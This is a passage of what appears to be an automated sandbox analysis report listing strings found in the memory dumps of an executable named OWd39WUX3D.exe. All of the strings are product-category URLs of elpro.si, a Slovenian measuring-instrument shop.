00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/opticna-stikala-nivoj
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/plavajoca-stikala/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/potopni-hidrostaticni
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/prikazovalniki-nivoja
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/zvezno-merjenje-nivoj
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-ph-co2-prevodnosti-vakuuma-vsebnosti-soli-kvalitet
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/digitalni-manometri/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/elektricni-pribor-za-merilnike-tlaka/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/kontaktni-manometri-2/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/merilni-pretvorniki-tlaka/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/montazni-pribor-za-merilnike-tlaka/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/procesni-pretvorniki-tlaka/
